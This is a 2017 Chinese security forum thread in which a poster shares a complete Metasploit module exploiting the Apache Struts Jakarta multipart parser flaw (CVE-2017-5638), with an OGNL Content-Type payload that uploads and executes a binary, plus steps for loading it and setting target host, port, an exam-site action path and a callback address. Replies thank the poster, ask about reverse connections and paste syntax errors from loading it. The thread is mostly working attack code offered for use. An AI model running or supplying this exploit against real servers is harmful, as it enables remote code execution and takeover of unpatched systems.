用户
搜索
  • TA的每日心情
    擦汗
    2017-1-28 19:53
  • 签到天数: 33 天

    连续签到: 1 天

    [LV.5]常住居民I

    版主

    Rank: 7Rank: 7Rank: 7

    85

    主题

    559

    帖子

    105

    魔法币
    收听
    0
    粉丝
    53
    注册时间
    2016-2-2

    楚燕春秋巡逻春秋游侠核心白帽签约作者突出贡献白帽高手秦齐赵

    发表于 2017-5-13 14:57:23 135431
    本帖最后由 MAX丶 于 2017-5-13 06:58 编辑

    好长时间没有写文章了,再不写将要被坏蛋给干掉了所以吓得我赶紧前来写写文章,本来我是想Metasploit移植MS17-010漏洞代码模块利用  可是我和小爱子研究了好长时间没有找到解决的办法,网上的一些都是少者少哪里很不好,所以等搞出来我在发吧。】我先把EXP贴在下面吧
    [Bash shell] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
    
    require 'msf/core'
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::EXE
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apache Struts Jakarta Multipart Parser Remote Code Execution',
          'Description'    => %q{
            This module exploits a remote code execution vunlerability in Apache Struts
            version 2.3.5 - 2.3.31,  and 2.5 - 2.5.10. Remote Code Execution can be performed
            via http Content-Type header.
          },
          'Author'         => [ 'Nixawk' ],
          'References'     => [
            ['CVE', '2017-5638'],
            ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
          ],
          'Platform'       => %w{ java linux win },
          'Privileged'     => true,
          'Targets'        =>
            [
              ['Windows Universal',
                {
                  'Arch' => ARCH_X86,
                  'Platform' => 'win'
                }
              ],
              ['Linux Universal',
                {
                  'Arch' => ARCH_X86,
                  'Platform' => 'linux'
                }
              ],
              [ 'Java Universal',
                {
                  'Arch' => ARCH_JAVA,
                  'Platform' => 'java'
                },
              ]
            ],
          'DisclosureDate' => 'Mar 07 2017',
          'DefaultTarget' => 2))
    
          register_options(
            [
              Opt::RPORT(8080),
              OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
              OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
            ]
          )
      end
    
      def print_status(msg='')
        super("#{peer} - #{msg}")
      end
    
      def get_target_platform
        target.platform.platforms.first
      end
    
      def temp_path
        @TMPPATH ||= lambda {
          path = datastore['TMPPATH']
          return nil unless path
    
          case get_target_platform
          when Msf::Module::Platform::Windows
            slash = '\\'
          when
            slash = '/'
          else
          end
    
          unless path.end_with?('/')
            path << '/'
          end
          return path
        }.call
      end
    
      def send_http_request(payload)
        uri = normalize_uri(datastore["TARGETURI"])
        resp = send_request_cgi(
          'uri'     => uri,
          'version' => '1.1',
          'method'  => 'GET',
          'headers' => {
            'Content-Type': payload
          }
        )
    
        if resp && resp.code == 404
          fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
        end
        resp
      end
    
      def upload_exec(cmd, filename, content)
        var_a = rand_text_alpha_lower(4)
        var_b = rand_text_alpha_lower(4)
        var_c = rand_text_alpha_lower(4)
    
        cmd = Rex::Text.encode_base64(cmd)
    
        payload = "%{"
        payload << "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    
        # save into a file / set file execution bit
        payload << "(##{var_a}=new sun.misc.BASE64Decoder())."
        payload << "(##{var_b}=new java.io.FileOutputStream('#{filename}'))."
        payload << "(##{var_b}.write(new java.math.BigInteger('#{content}', 16).toByteArray()))."
        payload << "(##{var_b}.close())."
        payload << "(##{var_c}=new java.io.File(new java.lang.String('#{filename}')))."
        payload << "(##{var_c}.setExecutable(true))."
        payload << "(@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer('#{cmd}'))))"
        payload << "}.multipart/form-data"
    
        send_http_request(payload)
      end
    
      def check
        var_a = rand_text_alpha_lower(4)
        var_b = rand_text_alpha_lower(4)
    
        payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
        payload << ".addHeader('#{var_a}', '#{var_b}')"
        payload << "}.multipart/form-data"
    
        begin
          resp = send_http_request(payload)
        rescue Msf::Exploit::Failed
          return Exploit::CheckCode::Unknown
        end
    
        if resp && resp.code == 200 && resp.headers[var_a] == var_b
          Exploit::CheckCode::Vulnerable
        else
          Exploit::CheckCode::Safe
        end
      end
    
      def exploit
        payload_exe = rand_text_alphanumeric(4 + rand(4))
        case target['Platform']
          when 'java'
            payload_exe = "#{temp_path}#{payload_exe}.jar"
            pl_exe = payload.encoded_jar.pack
            command = "java -jar #{payload_exe}"
          when 'linux'
            path = datastore['TMPPATH'] || '/tmp/'
            pl_exe = generate_payload_exe
            payload_exe = "#{path}#{payload_exe}"
            command = "/bin/sh -c #{payload_exe}"
          when 'win'
            path = temp_path || '.\\'
            pl_exe = generate_payload_exe
            payload_exe = "#{path}#{payload_exe}.exe"
    
            print_status(payload_exe)
            command = "cmd.exe /c #{payload_exe}"
          else
            fail_with(Failure::NoTarget, 'Unsupported target platform!')
        end
    
        pl_content = pl_exe.unpack('H*').join()
    
        print_status("Uploading exploit to #{payload_exe}, and executing it.")
        upload_exec(command, payload_exe, pl_content)
      end
    end


    你们可以复制下来放在MSF目录里面我个人先换放在这【/usr/share/metasploit-framework/modules/exploits/windows/smb/】 1.png


    我们打开MSF运行脚本就可以了】
    2.png


    3.png
    Set RHOST 目标站

    set RPORT 80

    Set TARGETURI /exam/examIndex!viewExamIndex.action

    Set LHOST 192.168.1.XXX




    4.png


    完美执行!!!
    我欲将心向明月,奈何明月照沟渠。
                      天人照我本和兴,只是难易风化岩。
    发表于 2017-5-13 15:45:45
    感谢分享
    使用道具 举报 回复
    发表于 2017-5-13 17:13:30
    感谢风向
    使用道具 举报 回复
    发表于 2017-5-15 15:11:45
    感谢分享
    使用道具 举报 回复
    发表于 2017-5-15 15:13:32
    感谢分享
    使用道具 举报 回复
    发表于 2017-5-15 16:40:38
    使用道具 举报 回复
    发表于 2017-5-15 17:03:17
    你的内网IP怎么弹回来的?做了端口转发之类?
    使用道具 举报 回复
    发表于 2017-5-15 17:03:56
    同样的exp同样的链接并且没有修复,我用的外网vps没弹回来。
    使用道具 举报 回复
    发表于 2017-5-16 16:58:42
    感谢分享!
    使用道具 举报 回复
    发表于 2017-5-19 13:20:13
    search无法找到文件是怎么回事?
    使用道具 举报 回复
    yyyxy 管理员 六国战旗移动展示平台! 秦 楚 燕 魏 齐 赵
    10#
    发表于 2017-5-19 14:08:38

    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    奖金
    点评
    0
    技术描述太少。

    使用道具 举报 回复
    发表于 2017-5-19 18:00:56
    yijiyouyu 发表于 2017-5-19 05:20
    search无法找到文件是怎么回事?

    缓存没建立好建议随便弄点msf原有漏洞set过后然后exploit 运行然后关闭就可以了】
    我欲将心向明月,奈何明月照沟渠。
                      天人照我本和兴,只是难易风化岩。
    使用道具 举报 回复
    ms17010 where is it      
    使用道具 举报 回复
    发表于 2017-5-30 14:04:18
    这个脚本貌似有一大堆语法错误啊,msf加载不出来,报了一大堆错。
    [-] WARNING! The following modules could not be loaded!
    [-]         /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'Name'           => ...
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected tIDENTIFIER, expecting keyword_end
    ...�  'Name'           => 'Apache Struts Jakarta Mu...
    ...                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected ',', expecting keyword_end
    ... Parser Remote Code Execution',
    ...                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:17: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Description'    => %q{
                                   ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:21: syntax error, unexpected ',', expecting keyword_end
          },
                  ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:22: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Author'         => [ 'Nixawk' ],
                                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:22: syntax error, unexpected ',', expecting keyword_end
          'Author'         => [ 'Nixawk' ],
                                                         ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:23: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'References'     => [
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:26: syntax error, unexpected tIDENTIFIER, expecting ']'
          ],
                ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:27: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Platform'       => %w{ java linux win },
                                      ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:27: syntax error, unexpected ',', expecting keyword_end
          'Platform'       => %w{ java linux win },
                                                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:28: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Privileged'     => true,
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:28: Can't assign to true
          'Privileged'     => true,
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:29: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'Targets'        =>
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:29: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Targets'        =>
                                       ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:34: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'win'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:34: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'win'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:36: syntax error, unexpected tIDENTIFIER, expecting ']'
              ],
                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:40: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'linux'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:40: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'linux'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:42: syntax error, unexpected tIDENTIFIER, expecting ']'
              ],
                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:46: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'java'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:46: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'java'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:49: syntax error, unexpected ']', expecting keyword_end
            ],
                     ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:51: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'DefaultTarget' => 2))
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:51: syntax error, unexpected =>, expecting keyword_end
          'DefaultTarget' => 2))
                                  ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:58: syntax error, unexpected tIDENTIFIER, expecting ']'
            ]
                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:93: syntax error, unexpected tIDENTIFIER, expecting ')'
          'uri'     => uri,
                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'version' => '1.1',
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected =>, expecting keyword_end
          'version' => '1.1',
                            ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected ',', expecting keyword_end
          'version' => '1.1',
                                   ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:95: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'method'  => 'GET',
                          ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:95: syntax error, unexpected ',', expecting keyword_end
          'method'  => 'GET',
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:97: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
            'Content-Type': payload
                     ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:98: syntax error, unexpected '}', expecting keyword_end
          }
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册